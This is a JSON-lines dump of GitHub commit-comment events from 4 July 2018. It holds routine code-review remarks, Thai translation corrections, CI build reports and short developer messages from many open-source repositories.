{"id":"7916655350","type":"CommitCommentEvent","actor":{"login":"micksatana"},"repo":{"name":"nodeschool/nodeschool.github.io"},"payload":{"comment":{"id":29590785,"position":39,"line":39,"path":"languages/th.json","commit_id":"5f2d17208ba17804840eb374faf5c20e0fab3e38","created_at":"2018-07-04T07:12:55Z","updated_at":"2018-07-04T07:12:55Z","author_association":"NONE","body":"should be ภูมิภาคอื่นๆ \r\nfor ? I must see context to know whether translate correctly."}},"created_at":"2018-07-04T07:12:55Z"}
{"id":"7916656754","type":"CommitCommentEvent","actor":{"login":"JC1738"},"repo":{"name":"opentable/sous"},"payload":{"comment":{"id":29590788,"position":null,"line":null,"path":null,"commit_id":"ea1517db235a3ad9e6223100c6f6c13626302612","created_at":"2018-07-04T07:13:14Z","updated_at":"2018-07-04T07:13:14Z","author_association":"MEMBER","body":"TeamCity Sous Support :: Sous Tests :: Smoke Tests Nightly (not exlude fail) [Build 31](https://teamcity.otenv.com/viewLog.html?buildId=8861719&buildTypeId=SousSupport_SousTests_SmokeTestsNightlyNotExludeFail) outcome was **SUCCESS**\nSummary: Tests passed: 24 Build time: 00:13:05"}},"created_at":"2018-07-04T07:13:14Z"}
{"id":"7916656895","type":"CommitCommentEvent","actor":{"login":"zombieJ"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":29590789,"position":null,"line":null,"path":null,"commit_id":"1c31efe392e33c6eaba83712985f915fc79faeea","created_at":"2018-07-04T07:13:16Z","updated_at":"2018-07-04T07:13:16Z","author_association":"MEMBER","body":"rc-trigger 在 test 下 mock 会使用最新 3.0.0-rc。这个在 treeSelect 测试没问题后才会全部升级，目前先锁一下。\r\n\r\n另外，eslint-plugin-jsx-a11y 新版规则对于 `jsx-a11y/aria-proptypes` 验证有点问题，看看这几天他们能不能解决，不能就先去掉这个 rule。\r\nref: https://github.com/evcohen/eslint-plugin-jsx-a11y/issues/454\r\n@afc163 @yesmeck "}},"created_at":"2018-07-04T07:13:16Z"}
{"id":"7916660545","type":"CommitCommentEvent","actor":{"login":"Deiv15"},"repo":{"name":"linode/manager"},"payload":{"comment":{"id":29590795,"position":14,"line":14,"path":"src/components/SelectStackScriptPanel.stories.tsx","commit_id":"18231be0df2ac6c857bbfe9a96274beab68e135d","created_at":"2018-07-04T07:14:12Z","updated_at":"2018-07-04T07:14:12Z","author_association":"NONE","body":"..."}},"created_at":"2018-07-04T07:14:12Z"}
{"id":"7916660914","type":"CommitCommentEvent","actor":{"login":"micksatana"},"repo":{"name":"nodeschool/nodeschool.github.io"},"payload":{"comment":{"id":29590796,"position":49,"line":49,"path":"languages/th.json","commit_id":"5f2d17208ba17804840eb374faf5c20e0fab3e38","created_at":"2018-07-04T07:14:16Z","updated_at":"2018-07-04T07:14:16Z","author_association":"NONE","body":"should be ตรวจสอบ instead of ตรวบสอบ"}},"created_at":"2018-07-04T07:14:16Z"}
{"id":"7916661076","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29590798,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-04T07:14:19Z","updated_at":"2018-07-04T07:14:19Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-04T07:14:19Z"}
{"id":"7916669611","type":"CommitCommentEvent","actor":{"login":"micksatana"},"repo":{"name":"nodeschool/nodeschool.github.io"},"payload":{"comment":{"id":29590818,"position":28,"line":28,"path":"languages/th.json","commit_id":"5f2d17208ba17804840eb374faf5c20e0fab3e38","created_at":"2018-07-04T07:16:20Z","updated_at":"2018-07-04T07:16:20Z","author_association":"NONE","body":"inconsistent use of word “Node” some use in English some in Thai. You might want to maje more consistent. "}},"created_at":"2018-07-04T07:16:20Z"}
{"id":"7916675972","type":"CommitCommentEvent","actor":{"login":"AL1L"},"repo":{"name":"artex-development/Lukkit"},"payload":{"comment":{"id":29590824,"position":null,"line":null,"path":null,"commit_id":"4f63c9409ca2e01abfe7b8db570b918431d1b555","created_at":"2018-07-04T07:17:52Z","updated_at":"2018-07-04T07:17:52Z","author_association":"MEMBER","body":"Fixed/added some utilities and returned the listener object after creating a listener"}},"created_at":"2018-07-04T07:17:52Z"}
{"id":"7916679766","type":"CommitCommentEvent","actor":{"login":"micksatana"},"repo":{"name":"nodeschool/nodeschool.github.io"},"payload":{"comment":{"id":29590833,"position":51,"line":51,"path":"languages/th.json","commit_id":"5f2d17208ba17804840eb374faf5c20e0fab3e38","created_at":"2018-07-04T07:18:48Z","updated_at":"2018-07-04T07:18:48Z","author_association":"NONE","body":"This line must see from context. But รายการหกเหลี่ยม seems odd to me"}},"created_at":"2018-07-04T07:18:48Z"}
{"id":"7916681444","type":"CommitCommentEvent","actor":{"login":"RiccardoManfrin"},"repo":{"name":"robpike/filter"},"payload":{"comment":{"id":29590840,"position":null,"line":null,"path":null,"commit_id":"2984852a21833704a7dd2a52fb34240eb3ab11f9","created_at":"2018-07-04T07:19:14Z","updated_at":"2018-07-04T07:19:14Z","author_association":"NONE","body":"Can I ask you why you don't advice the usage of such package? THanks"}},"created_at":"2018-07-04T07:19:14Z"}
{"id":"7916681751","type":"CommitCommentEvent","actor":{"login":"31m059"},"repo":{"name":"31m059/Stockfish"},"payload":{"comment":{"id":29590841,"position":null,"line":null,"path":null,"commit_id":"986e3d07c00e0b2b92cc23d7c02e93a789fa81c7","created_at":"2018-07-04T07:19:18Z","updated_at":"2018-07-04T07:19:18Z","author_association":"OWNER","body":"@saurus1969 Welcome!\r\n\r\nI intended to submit both endgame-only and middlegame & endgame tests as well, but I submitted middlegame-only first because I thought this would be most relevant for attacking the enemy king."}},"created_at":"2018-07-04T07:19:18Z"}
{"id":"7916682136","type":"CommitCommentEvent","actor":{"login":"jarveson"},"repo":{"name":"jarveson/rpcs3"},"payload":{"comment":{"id":29590843,"position":null,"line":null,"path":null,"commit_id":"5f4455eff7a08aec1481d7842fd3079deb20dca1","created_at":"2018-07-04T07:19:24Z","updated_at":"2018-07-04T07:19:24Z","author_association":"OWNER","body":"cause it cant be recreated on console, hey @ScorchEmber256 you seem willing, why doesnt it *actually* work"}},"created_at":"2018-07-04T07:19:24Z"}
{"id":"7916686719","type":"CommitCommentEvent","actor":{"login":"ry0id"},"repo":{"name":"void-archive/learning-go"},"payload":{"comment":{"id":29590851,"position":null,"line":null,"path":null,"commit_id":"edb9b59e5f73b78d5878a27fca82178900b0fb0a","created_at":"2018-07-04T07:20:30Z","updated_at":"2018-07-04T07:20:30Z","author_association":"CONTRIBUTOR","body":"typo *gp -> go"}},"created_at":"2018-07-04T07:20:30Z"}
{"id":"7916687042","type":"CommitCommentEvent","actor":{"login":"ilozanof"},"repo":{"name":"bitcoinj/bitcoinj"},"payload":{"comment":{"id":29590855,"position":null,"line":null,"path":null,"commit_id":"89fb8c3bfadd67c99271db0b94b6b48da5e8454c","created_at":"2018-07-04T07:20:35Z","updated_at":"2018-07-04T07:20:35Z","author_association":"NONE","body":"You are right, thanks for the advice. I've just created an issue for this."}},"created_at":"2018-07-04T07:20:35Z"}
{"id":"7916691486","type":"CommitCommentEvent","actor":{"login":"normanmaurer"},"repo":{"name":"netty/netty"},"payload":{"comment":{"id":29590869,"position":32,"line":1037,"path":"transport-native-unix-common/src/main/c/netty_unix_socket.c","commit_id":"7f5e77484caa05504b4e6c4527ac7bf1732d01c8","created_at":"2018-07-04T07:21:35Z","updated_at":"2018-07-04T07:21:35Z","author_association":"MEMBER","body":"Merged.. thanks "}},"created_at":"2018-07-04T07:21:35Z"}
{"id":"7916692678","type":"CommitCommentEvent","actor":{"login":"anil92"},"repo":{"name":"kobal96/propdoor"},"payload":{"comment":{"id":29590873,"position":null,"line":null,"path":null,"commit_id":"ed95f37d51c3e340b3abf7813fee2714c209c4fa","created_at":"2018-07-04T07:21:53Z","updated_at":"2018-07-04T07:21:53Z","author_association":"NONE","body":"Shiv"}},"created_at":"2018-07-04T07:21:53Z"}
{"id":"7916693566","type":"CommitCommentEvent","actor":{"login":"Javey"},"repo":{"name":"ksc-fe/kpc"},"payload":{"comment":{"id":29590877,"position":5,"line":91,"path":"components/dropdown/item.js","commit_id":"e101c4b94113db95e6c21d165147a2d4f34bde56","created_at":"2018-07-04T07:22:07Z","updated_at":"2018-07-04T07:22:07Z","author_association":"MEMBER","body":"closes #45 "}},"created_at":"2018-07-04T07:22:07Z"}
{"id":"7916693934","type":"CommitCommentEvent","actor":{"login":"micksatana"},"repo":{"name":"nodeschool/nodeschool.github.io"},"payload":{"comment":{"id":29590878,"position":135,"line":135,"path":"languages/th.json","commit_id":"5f2d17208ba17804840eb374faf5c20e0fab3e38","created_at":"2018-07-04T07:22:12Z","updated_at":"2018-07-04T07:22:12Z","author_association":"NONE","body":"C++ "}},"created_at":"2018-07-04T07:22:12Z"}
{"id":"7916696228","type":"CommitCommentEvent","actor":{"login":"icemac"},"repo":{"name":"zopefoundation/zope.testrunner"},"payload":{"comment":{"id":29590885,"position":null,"line":null,"path":null,"commit_id":"e6659234c052ae9ec17a7185315d0e1db639c997","created_at":"2018-07-04T07:22:44Z","updated_at":"2018-07-04T07:22:44Z","author_association":"CONTRIBUTOR","body":"On the `dist` used by default Python 3.7 is still to be referenced as `3.7-dev`. There is even an `3.8-dev`."}},"created_at":"2018-07-04T07:22:44Z"}
{"id":"7916696533","type":"CommitCommentEvent","actor":{"login":"richardbuckle"},"repo":{"name":"EDCD/EDDI"},"payload":{"comment":{"id":29590886,"position":null,"line":null,"path":null,"commit_id":"4804dd63fb7a6c65a859da156badaca83eb52ea1","created_at":"2018-07-04T07:22:48Z","updated_at":"2018-07-04T07:22:48Z","author_association":"COLLABORATOR","body":"It makes a difference because the loadout event is flat-out lying to us right now. Say your Hull is at 42%. The CAPI reports this correctly, but then the loadout event comes along and says it is 100%. So we need to ignore the incorrect data.\r\n\r\nIn general I agree: I really don’t like disabling stuff that we need to remember to re-enable later. But we’re in a bit of a bind here, at least until we hear back from FD.\r\n\r\nAny third options gratefully received."}},"created_at":"2018-07-04T07:22:48Z"}
{"id":"7916723648","type":"CommitCommentEvent","actor":{"login":"micksatana"},"repo":{"name":"nodeschool/nodeschool.github.io"},"payload":{"comment":{"id":29590940,"position":null,"line":null,"path":null,"commit_id":"5f2d17208ba17804840eb374faf5c20e0fab3e38","created_at":"2018-07-04T07:28:57Z","updated_at":"2018-07-04T07:28:57Z","author_association":"NONE","body":"inconsistent uses of words for example “opensource” in Thai doesn’t translate consistently. โอเพน or โอเพ่น kindly recheck with ราชบัณฑิตยสถาน"}},"created_at":"2018-07-04T07:28:57Z"}
{"id":"7916723661","type":"CommitCommentEvent","actor":{"login":"cgcloud-jenkins"},"repo":{"name":"vgteam/vg"},"payload":{"comment":{"id":29590941,"position":null,"line":null,"path":null,"commit_id":"e41a5089167efbd398ac3a7d2b2a396a161ebe4e","created_at":"2018-07-04T07:28:57Z","updated_at":"2018-07-04T07:28:57Z","author_association":"NONE","body":"[Jenkins vg tests](http://jenkins.cgcloud.info/job/vg/1972/) complete for merge to master.  View the [full report here](http://cgl-pipeline-inputs.s3.amazonaws.com/vg_cgl/vg_ci/jenkins_reports/branch/master/index.html).\n\n19 tests passed, 0 tests failed and 10 tests skipped in 18676 seconds\n\nTests produced 2925 warnings. 2925 were for lower-than-expected alignment scores\n\n"}},"created_at":"2018-07-04T07:28:57Z"}
{"id":"7916728874","type":"CommitCommentEvent","actor":{"login":"sidey79"},"repo":{"name":"RFD-FHEM/RFFHEM"},"payload":{"comment":{"id":29590950,"position":null,"line":null,"path":null,"commit_id":"5b24ee8334d09ec08594b2a238b6138a005e2086","created_at":"2018-07-04T07:30:11Z","updated_at":"2018-07-04T07:30:11Z","author_association":"CONTRIBUTOR","body":"Das mit dem repeat <20 sieht so nach dem umgehen eines Bugs aus.\r\nDas gefällt mir nicht.\r\n\r\nDu schreibst ja, dass Du die Funktion optimiert hättest.\r\nDas wäre ja nicht richtig, wenn bis zu 20* versucht wird eine Wiederholung zu finden.\r\n\r\nVor dem PR hat es ja funktioniert, dass es zu keiner Endlosschleife kommt.\r\n\r\nUm die Funktion zu testen wäre es gut, Test Signale zu definieren, die alle Fälle abdecken. So weiss man dann auch gleich, ob da noch ein Fehler ist.\r\nVielleicht sollten wir eine Funktion mit Prüffunktion in den Protocol Hash aufnehmen und damit einen Selbsttest laufen lassen."}},"created_at":"2018-07-04T07:30:11Z"}
{"id":"7916731353","type":"CommitCommentEvent","actor":{"login":"FlinteW"},"repo":{"name":"FlinteW/avengers"},"payload":{"comment":{"id":29590965,"position":null,"line":null,"path":null,"commit_id":"c59a03d607a24bea5c8144e2299810bcc4b5f923","created_at":"2018-07-04T07:30:42Z","updated_at":"2018-07-04T07:30:42Z","author_association":"OWNER","body":"Aqui creamos la misions de redS #8 \r\n\r\nvalee"}},"created_at":"2018-07-04T07:30:42Z"}
{"id":"7916732749","type":"CommitCommentEvent","actor":{"login":"hediweicd"},"repo":{"name":"hediweicd/study"},"payload":{"comment":{"id":29590969,"position":null,"line":null,"path":null,"commit_id":"5623545a69a64ac5fec4f51b3bb3c8e1975406ef","created_at":"2018-07-04T07:31:00Z","updated_at":"2018-07-04T07:31:00Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-04T07:31:00Z"}
{"id":"7916734238","type":"CommitCommentEvent","actor":{"login":"zhuyingshan"},"repo":{"name":"EmptyWalletException/TopTalk"},"payload":{"comment":{"id":29590972,"position":null,"line":null,"path":null,"commit_id":"22d66e015bebf6f0efe259424e10f34fc299904d","created_at":"2018-07-04T07:31:20Z","updated_at":"2018-07-04T07:31:20Z","author_association":"NONE","body":"你好，可以发布一下数据库文件吗，我想看看具体的界面运行情况，谢谢啦"}},"created_at":"2018-07-04T07:31:20Z"}
{"id":"7916734397","type":"CommitCommentEvent","actor":{"login":"kelihlodversson"},"repo":{"name":"th-otto/pTOS"},"payload":{"comment":{"id":29590973,"position":15,"line":15,"path":"include/vdipb.h","commit_id":"17dc5da5732a788155ca47efa733ff280afe0daf","created_at":"2018-07-04T07:31:22Z","updated_at":"2018-07-04T07:31:22Z","author_association":"NONE","body":"This pad is strictly not needed on arm, as the structure is not packed, and the compiler will automatically align the following LONG on a 4 byte boundary"}},"created_at":"2018-07-04T07:31:22Z"}
{"id":"7916744303","type":"CommitCommentEvent","actor":{"login":"net1414080903214"},"repo":{"name":"fzlee/alipay"},"payload":{"comment":{"id":29590997,"position":null,"line":null,"path":null,"commit_id":"9252eea3ef630abcbb0082cf9f18cf72474c4624","created_at":"2018-07-04T07:33:32Z","updated_at":"2018-07-04T07:33:32Z","author_association":"NONE","body":"你好 ，我使用这个python-sdk-alipay插件的app支付少了alipay_sdk参数，"}},"created_at":"2018-07-04T07:33:32Z"}
{"id":"7916748710","type":"CommitCommentEvent","actor":{"login":"net1414080903214"},"repo":{"name":"fzlee/alipay"},"payload":{"comment":{"id":29591005,"position":null,"line":null,"path":null,"commit_id":"9252eea3ef630abcbb0082cf9f18cf72474c4624","created_at":"2018-07-04T07:34:32Z","updated_at":"2018-07-04T07:34:32Z","author_association":"NONE","body":"python-sdk-alipay是否可以做app支付的啊\r\n"}},"created_at":"2018-07-04T07:34:32Z"}
{"id":"7916750861","type":"CommitCommentEvent","actor":{"login":"francescomosca-eos"},"repo":{"name":"gcancro/tbox"},"payload":{"comment":{"id":29591009,"position":null,"line":null,"path":null,"commit_id":"b5a59adb6bf88068c2f261e089ab1d2a1d7042ea","created_at":"2018-07-04T07:35:01Z","updated_at":"2018-07-04T07:35:01Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Flusso di ingresso](https://trello.com/c/JcJ4vohw/4-flusso-di-ingresso)"}},"created_at":"2018-07-04T07:35:01Z"}
{"id":"7916756270","type":"CommitCommentEvent","actor":{"login":"ale-rt"},"repo":{"name":"zopefoundation/zope.testrunner"},"payload":{"comment":{"id":29591020,"position":null,"line":null,"path":null,"commit_id":"e6659234c052ae9ec17a7185315d0e1db639c997","created_at":"2018-07-04T07:36:11Z","updated_at":"2018-07-04T07:36:11Z","author_association":"NONE","body":"Oh! Thanks!"}},"created_at":"2018-07-04T07:36:11Z"}
{"id":"7916759626","type":"CommitCommentEvent","actor":{"login":"fzlee"},"repo":{"name":"fzlee/alipay"},"payload":{"comment":{"id":29591032,"position":null,"line":null,"path":null,"commit_id":"9252eea3ef630abcbb0082cf9f18cf72474c4624","created_at":"2018-07-04T07:36:57Z","updated_at":"2018-07-04T07:36:57Z","author_association":"OWNER","body":"1. 支持app支付\r\n2. 请提交issue仔细描述你的问题。\r\n\r\n这里是提交commit的地方， 不适合用作提问"}},"created_at":"2018-07-04T07:36:57Z"}
{"id":"7916765682","type":"CommitCommentEvent","actor":{"login":"Freezingsmile"},"repo":{"name":"MonkeyVersusShark/MyWeather"},"payload":{"comment":{"id":29591045,"position":null,"line":null,"path":null,"commit_id":"02fb4cf142c1064eef8c387487de0e1bf69182f6","created_at":"2018-07-04T07:38:22Z","updated_at":"2018-07-04T07:38:22Z","author_association":"COLLABORATOR","body":"初步实现程序架构的草图"}},"created_at":"2018-07-04T07:38:22Z"}
{"id":"7916770739","type":"CommitCommentEvent","actor":{"login":"carlhannes"},"repo":{"name":"qlik-oss/picasso.js"},"payload":{"comment":{"id":29591058,"position":null,"line":null,"path":null,"commit_id":"1b396014f1766157f1524f51896abdbc3abdc594","created_at":"2018-07-04T07:39:34Z","updated_at":"2018-07-04T07:39:34Z","author_association":"COLLABORATOR","body":"@miralemd why is there a version bump for q and hammer aswell?"}},"created_at":"2018-07-04T07:39:34Z"}
{"id":"7916773884","type":"CommitCommentEvent","actor":{"login":"krlmlr"},"repo":{"name":"r-lib/crayon"},"payload":{"comment":{"id":29591062,"position":3,"line":3,"path":"R/has_ansi.r","commit_id":"7d128804d8a6a45fbaecce461021463062ad921e","created_at":"2018-07-04T07:40:14Z","updated_at":"2018-07-04T07:40:14Z","author_association":"MEMBER","body":"Can an ANSI sequence be terminated by a pipe symbol? Or should `[A-M|f-m]` be really `[A-Mf-m]`?\r\n\r\n``` r\r\ngrepl(crayon:::ansi_regex, \"\\033[|\")\r\n#> [1] TRUE\r\n```\r\n\r\n> Created on 2018-07-04 by the [reprex package](http://reprex.tidyverse.org) (v0.2.0)."}},"created_at":"2018-07-04T07:40:14Z"}
{"id":"7916774216","type":"CommitCommentEvent","actor":{"login":"pluto-tu"},"repo":{"name":"pluto-tu/pluto-tu.github.io"},"payload":{"comment":{"id":29591063,"position":null,"line":null,"path":null,"commit_id":"6f23407f033ba58329e2201ecd4b44704acd0a26","created_at":"2018-07-04T07:40:18Z","updated_at":"2018-07-04T07:40:18Z","author_association":"OWNER","body":"CNAME"}},"created_at":"2018-07-04T07:40:18Z"}
{"id":"7916779872","type":"CommitCommentEvent","actor":{"login":"VictorFanGoogle"},"repo":{"name":"VictorFanGoogle/Khashing"},"payload":{"comment":{"id":29591072,"position":5,"line":98,"path":"include/css/index.css","commit_id":"716bf836181ad7f6cfe81e2297da0a86f670ba32","created_at":"2018-07-04T07:41:32Z","updated_at":"2018-07-04T07:41:32Z","author_association":"OWNER","body":"林哲廣 is 白癡"}},"created_at":"2018-07-04T07:41:32Z"}
{"id":"7916780845","type":"CommitCommentEvent","actor":{"login":"VictorFanGoogle"},"repo":{"name":"VictorFanGoogle/Khashing"},"payload":{"comment":{"id":29591074,"position":null,"line":null,"path":null,"commit_id":"716bf836181ad7f6cfe81e2297da0a86f670ba32","created_at":"2018-07-04T07:41:43Z","updated_at":"2018-07-04T07:41:43Z","author_association":"OWNER","body":"林娥廣"}},"created_at":"2018-07-04T07:41:43Z"}
{"id":"7916784202","type":"CommitCommentEvent","actor":{"login":"kutzi"},"repo":{"name":"serenity-bdd/serenity-core"},"payload":{"comment":{"id":29591077,"position":null,"line":null,"path":null,"commit_id":"badc7517a9afdeee96c4dac589815e84507031fb","created_at":"2018-07-04T07:42:26Z","updated_at":"2018-07-04T07:42:26Z","author_association":"CONTRIBUTOR","body":"Hmm, maybe you should leave a Cucumber-JVM major version update for a major Serenity version update?\r\nOr at least mention this more explicitely?\r\nCucumber-JVM 3.x has a lot of breaking API changes AFAIK\r\nhttps://cucumber.io/blog/2018/05/19/announcing-cucumber-jvm-3-0-0"}},"created_at":"2018-07-04T07:42:26Z"}
{"id":"7916789842","type":"CommitCommentEvent","actor":{"login":"stof"},"repo":{"name":"adrai/flowchart.js"},"payload":{"comment":{"id":29591097,"position":12,"line":222,"path":"src/flowchart.symbol.js","commit_id":"5ef39573a7dc1cc9c01e4371a676cb850558f86c","created_at":"2018-07-04T07:43:44Z","updated_at":"2018-07-04T07:43:44Z","author_association":"NONE","body":"you could even optimize things by doing this check earlier, before computing `hasSymbolUnder`"}},"created_at":"2018-07-04T07:43:44Z"}
{"id":"7916791010","type":"CommitCommentEvent","actor":{"login":"jackejiang"},"repo":{"name":"OISF/suricata"},"payload":{"comment":{"id":29591102,"position":null,"line":null,"path":null,"commit_id":"f8ebcac73612cea982606a9bd8a1b9d909f2387f","created_at":"2018-07-04T07:43:59Z","updated_at":"2018-07-04T07:43:59Z","author_association":"NONE","body":"One more place in UnixSocketUnregisterTenantHandler:\r\njson_object_set_new(answer, \"message\", json_string(\"handler added\"));"}},"created_at":"2018-07-04T07:43:59Z"}
{"id":"7916803703","type":"CommitCommentEvent","actor":{"login":"dedeckeh"},"repo":{"name":"openwrt/openwrt"},"payload":{"comment":{"id":29591128,"position":null,"line":null,"path":null,"commit_id":"e705342bf8cf1e5c2c1750cf50ab3cf04cc2e080","created_at":"2018-07-04T07:46:39Z","updated_at":"2018-07-04T07:46:39Z","author_association":"CONTRIBUTOR","body":"@diizzyy \r\nNot a bad idea; will look into it"}},"created_at":"2018-07-04T07:46:39Z"}
{"id":"7916805932","type":"CommitCommentEvent","actor":{"login":"Sadhumargi"},"repo":{"name":"Sadhumargi/SramanoPasaka"},"payload":{"comment":{"id":29591135,"position":null,"line":null,"path":null,"commit_id":"3430b4997c5fa2e5fd6f1423a556db98d9bcfb81","created_at":"2018-07-04T07:47:10Z","updated_at":"2018-07-04T07:47:10Z","author_association":"OWNER","body":"Onclick pay code was commented."}},"created_at":"2018-07-04T07:47:10Z"}
{"id":"7916806288","type":"CommitCommentEvent","actor":{"login":"199608"},"repo":{"name":"199608/learn-git"},"payload":{"comment":{"id":29591137,"position":null,"line":null,"path":null,"commit_id":"755d49c6d4e1114469ded7748c4ea770bf7ccdac","created_at":"2018-07-04T07:47:14Z","updated_at":"2018-07-04T07:47:14Z","author_association":"OWNER","body":"learn-git"}},"created_at":"2018-07-04T07:47:14Z"}
{"id":"7916810165","type":"CommitCommentEvent","actor":{"login":"tkislan"},"repo":{"name":"kodi-connect/kodi-connect-addon"},"payload":{"comment":{"id":29591140,"position":null,"line":null,"path":null,"commit_id":"0f358dc093cd697697ce1bd1784cfbfe00b0e40f","created_at":"2018-07-04T07:48:08Z","updated_at":"2018-07-04T07:48:08Z","author_association":"CONTRIBUTOR","body":"@kevin111263 Hey, I've added your email."}},"created_at":"2018-07-04T07:48:08Z"}
{"id":"7916812232","type":"CommitCommentEvent","actor":{"login":"AlexisDrogoul"},"repo":{"name":"gama-platform/gama"},"payload":{"comment":{"id":29591145,"position":null,"line":null,"path":null,"commit_id":"debca9de3189edd229e2a8958e6de3bf28e6afa2","created_at":"2018-07-04T07:48:36Z","updated_at":"2018-07-04T07:48:36Z","author_association":"MEMBER","body":"Arghhh... Shame on me !"}},"created_at":"2018-07-04T07:48:36Z"}
{"id":"7916813013","type":"CommitCommentEvent","actor":{"login":"LipuFei"},"repo":{"name":"Ultimaker/cura-build-environment"},"payload":{"comment":{"id":29591146,"position":null,"line":null,"path":null,"commit_id":"57b09b6fe00791e998962a7bf9e518edcbc59ccc","created_at":"2018-07-04T07:48:48Z","updated_at":"2018-07-04T07:48:48Z","author_association":"CONTRIBUTOR","body":"@thopiekar I'm doing some cleanup and this branch is pretty old. If you don't need this branch any more, let me know and I will remove it. Thanks."}},"created_at":"2018-07-04T07:48:48Z"}
{"id":"7916819576","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":29591162,"position":null,"line":null,"path":null,"commit_id":"d00777e1d7c5f129b8b86837f7a03c4e1de7da35","created_at":"2018-07-04T07:50:16Z","updated_at":"2018-07-04T07:50:16Z","author_association":"COLLABORATOR","body":"Also see [Issue 678](https://github.com/weidai11/cryptopp/issues/678)."}},"created_at":"2018-07-04T07:50:16Z"}
{"id":"7916820398","type":"CommitCommentEvent","actor":{"login":"esl4m"},"repo":{"name":"raccoongang/edx-platform"},"payload":{"comment":{"id":29591164,"position":null,"line":null,"path":null,"commit_id":"6f0bdaeda6716356a3baec9cc8a757a991a67bfb","created_at":"2018-07-04T07:50:27Z","updated_at":"2018-07-04T07:50:27Z","author_association":"NONE","body":"@Marx86 this is production !"}},"created_at":"2018-07-04T07:50:27Z"}
{"id":"7916823085","type":"CommitCommentEvent","actor":{"login":"Yaanar"},"repo":{"name":"Yaanar/Rewinder"},"payload":{"comment":{"id":29591168,"position":null,"line":null,"path":null,"commit_id":"163eb6c64fff0c778b3d223259e888b1f836ea42","created_at":"2018-07-04T07:51:05Z","updated_at":"2018-07-04T07:51:05Z","author_association":"OWNER","body":"Delete"}},"created_at":"2018-07-04T07:51:05Z"}
{"id":"7916829174","type":"CommitCommentEvent","actor":{"login":"weikang761195"},"repo":{"name":"hauiscool/test"},"payload":{"comment":{"id":29591179,"position":null,"line":null,"path":null,"commit_id":"dc92c19a917244eb90eaffbed9c805ec0808c410","created_at":"2018-07-04T07:52:25Z","updated_at":"2018-07-04T07:52:25Z","author_association":"NONE","body":"test"}},"created_at":"2018-07-04T07:52:25Z"}
{"id":"7916832970","type":"CommitCommentEvent","actor":{"login":"Alfusainey"},"repo":{"name":"eclipse/hono"},"payload":{"comment":{"id":29591184,"position":40,"line":40,"path":"tests/src/test/java/org/eclipse/hono/tests/registry/DeviceRegistrationAmqpIT.java","commit_id":"2351c82b2c435dfdd3aad27e0c2e34c9c96c2cad","created_at":"2018-07-04T07:53:15Z","updated_at":"2018-07-04T07:53:15Z","author_association":"CONTRIBUTOR","body":"how about: `Tests verifying the behavior of the \"Registration AMQP endpoint\" component of the Device Registry` ?"}},"created_at":"2018-07-04T07:53:15Z"}
{"id":"7916834472","type":"CommitCommentEvent","actor":{"login":"deanblackborough"},"repo":{"name":"deanblackborough/php-quill-renderer"},"payload":{"comment":{"id":29591187,"position":6,"line":50,"path":"src/Parser/Html.php","commit_id":"0347d656b23e7d92afdc24aaf55a691682a20426","created_at":"2018-07-04T07:53:34Z","updated_at":"2018-07-04T07:53:34Z","author_association":"OWNER","body":"Bold::Class??"}},"created_at":"2018-07-04T07:53:34Z"}
{"id":"7916836962","type":"CommitCommentEvent","actor":{"login":"jg16800"},"repo":{"name":"jg16800/test"},"payload":{"comment":{"id":29591190,"position":null,"line":null,"path":null,"commit_id":"cadac2e540a5ac6b8136e2af88eb63484f619407","created_at":"2018-07-04T07:54:07Z","updated_at":"2018-07-04T07:54:07Z","author_association":"OWNER","body":"kjhkjhkjh"}},"created_at":"2018-07-04T07:54:07Z"}
{"id":"7916845893","type":"CommitCommentEvent","actor":{"login":"sultan36"},"repo":{"name":"sultan36/Evalona"},"payload":{"comment":{"id":29591209,"position":null,"line":null,"path":null,"commit_id":"e81c959739f6fe4b1448c3dc9bb21b2bd1a6eb17","created_at":"2018-07-04T07:56:00Z","updated_at":"2018-07-04T07:56:00Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-04T07:56:00Z"}
{"id":"7916847245","type":"CommitCommentEvent","actor":{"login":"bmarty"},"repo":{"name":"dinsic-pim/riot-android"},"payload":{"comment":{"id":29591210,"position":16,"line":104,"path":"vector/src/main/java/fr/gouv/tchap/util/DinsicUtils.java","commit_id":"1fcec5bf02d303b385ddcd11c707b5312d29f068","created_at":"2018-07-04T07:56:17Z","updated_at":"2018-07-04T07:56:17Z","author_association":"NONE","body":"- On the form: `@Nullable` and method other method annotations are generally added on a line above the method declaration\r\n- On the bottom: is it not safer to return `\"\"` when `displayName` is null?"}},"created_at":"2018-07-04T07:56:17Z"}
{"id":"7916866895","type":"CommitCommentEvent","actor":{"login":"Damanjeet88"},"repo":{"name":"Damanjeet88/CI_CRUD"},"payload":{"comment":{"id":29591247,"position":null,"line":null,"path":null,"commit_id":"ce17c3e468ea621e73467951a92dd9442f065a4e","created_at":"2018-07-04T08:00:21Z","updated_at":"2018-07-04T08:00:21Z","author_association":"OWNER","body":"- Success Msg roughed in.\r\n- Form Reset Functionality added using jQuery."}},"created_at":"2018-07-04T08:00:21Z"}
